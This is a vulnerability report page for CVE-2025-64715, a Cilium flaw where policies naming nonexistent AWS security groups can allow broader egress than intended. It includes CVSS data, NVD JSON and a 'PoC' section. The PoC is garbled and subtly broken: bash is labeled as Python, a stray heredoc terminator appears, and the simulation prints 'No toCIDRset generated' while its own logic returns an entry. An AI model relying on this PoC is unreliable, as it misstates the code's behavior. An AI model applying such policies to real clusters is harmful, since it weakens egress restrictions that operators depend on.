Security Vulnerability Report
中文
CVE-2025-64715 CVSS 4.0 MEDIUM

CVE-2025-64715

Published: 2025-11-29 01:16:01
Last Modified: 2025-12-04 20:38:45
Source: [email protected]

Description

Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.16.17, 1.17.10, and 1.18.4, CiliumNetworkPolicys which use egress.toGroups.aws.securityGroupsIds to reference AWS security group IDs that do not exist or are not attached to any network interface may unintentionally allow broader outbound access than intended by the policy authors. In such cases, the toCIDRset section of the derived policy is not generated, which means outbound traffic may be permitted to more destinations than originally intended. This issue has been patched in versions 1.16.17, 1.17.10, and 1.18.4. There are no workarounds for this issue.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:* - VULNERABLE
Cilium < 1.16.17
Cilium < 1.17.10
Cilium < 1.18.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-64715 PoC - Cilium AWS Security Group Policy Bypass # This PoC demonstrates how referencing non-existent AWS security groups # in CiliumNetworkPolicy can result in unintended traffic allowance cat << 'EOF' > vulnerable-policy.yaml apiVersion: cilium.io/v2 kind: CiliumNetworkPolicy metadata: name: egress-to-aws-sg spec: egress: - toGroups: - aws: securityGroupsIds: - "sg-00000000000000000" # Non-existent security group ID - toPorts: - ports: - port: "443" protocol: TCP EOF # Apply the vulnerable policy kubectl apply -f vulnerable-policy.yaml # Verify the generated policy (toCIDRset should be empty or missing) kubectl get cnp egress-to-aws-sg -o yaml # Check if traffic is unexpectedly allowed to all destinations # The policy will allow egress to all IPs instead of restricting to SG-associated IPs EOF # Python PoC to demonstrate the policy generation issue cat << 'EOF' > policy_bypass_demo.py #!/usr/bin/env python3 """ CVE-2025-64715 - Cilium AWS Security Group Policy Bypass PoC Demonstrates how non-existent AWS security group references cause policy bypass """ import json def simulate_cilium_policy_processing(security_group_ids, sg_exists_map): """ Simulate Cilium's policy processing for AWS security groups Args: security_group_ids: List of AWS security group IDs in the policy sg_exists_map: Dict mapping SG ID to whether it exists (True/False) Returns: Generated toCIDRset rules """ to_cidr_set = [] for sg_id in security_group_ids: if sg_exists_map.get(sg_id, False): # SG exists, would resolve to actual IP ranges to_cidr_set.append(f"resolved_ip_for_{sg_id}") else: # SG does not exist - BUG: silently skips without blocking print(f"[!] Security group {sg_id} not found, skipping...") # The bug: no toCIDRset is generated, but policy still allows traffic continue return to_cidr_set # Vulnerable scenario: non-existent security group print("=== CVE-2025-64715 Policy Bypass Demonstration ===\n") policy_sgs = ["sg-12345678", "sg-nonexistent-id"] sg_status = { "sg-12345678": True, # Exists, has IPs "sg-nonexistent-id": False # Does NOT exist } print(f"Policy references security groups: {policy_sgs}") print(f"Security group status: {sg_status}\n") result = simulate_cilium_policy_processing(policy_sgs, sg_status) print(f"\nGenerated toCIDRset: {result}") print("\n[!] VULNERABILITY: No toCIDRset generated!") print("[!] Result: Egress policy allows traffic to ALL destinations") print("[!] Expected: Policy should either fail or restrict to found SGs") # Fixed behavior simulation print("\n\n=== Expected Fixed Behavior ===") def fixed_policy_processing(security_group_ids, sg_exists_map): """Fixed version that properly handles missing security groups""" to_cidr_set = [] missing_sgs = [] for sg_id in security_group_ids: if sg_exists_map.get(sg_id, False): to_cidr_set.append(f"resolved_ip_for_{sg_id}") else: missing_sgs.append(sg_id) if missing_sgs: print(f"[!] ERROR: Referenced security groups not found: {missing_sgs}") print("[!] Policy validation FAILED - will not apply") return None return to_cidr_set result_fixed = fixed_policy_processing(policy_sgs, sg_status) EOF

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64715", "sourceIdentifier": "[email protected]", "published": "2025-11-29T01:16:01.427", "lastModified": "2025-12-04T20:38:45.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.16.17, 1.17.10, and 1.18.4, CiliumNetworkPolicys which use egress.toGroups.aws.securityGroupsIds to reference AWS security group IDs that do not exist or are not attached to any network interface may unintentionally allow broader outbound access than intended by the policy authors. In such cases, the toCIDRset section of the derived policy is not generated, which means outbound traffic may be permitted to more destinations than originally intended. This issue has been patched in versions 1.16.17, 1.17.10, and 1.18.4. There are no workarounds for this issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.16.17", "matchCriteriaId": "4A7D5E2F-7DF6-4EBE-8E0C-63C0C39D8D29"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.17.0", "versionEndExcluding": "1.17.10", "matchCriteriaId": "BD15500F-5958-45C4-BF78-9756FEB4CB2F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.18.0", "versionEndExcluding": "1.18.4", "matchCriteriaId": "C2C4B9B4-3CB3-47A3-ACF9-195E77B2FE2B"}]}]}], "references": [{"url": "https://github.com/cilium/cilium/commit/a385856b59c8289cc7273fa3a3062bbf0ef96c97", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/cilium/cilium/releases/tag/v1.16.17", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/cilium/cilium/releases/tag/v1.17.10", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/cilium/cilium/releases/tag/v1.18.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/cilium/cilium/security/advisories/GHSA-38pp-6gcp-rqvm", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.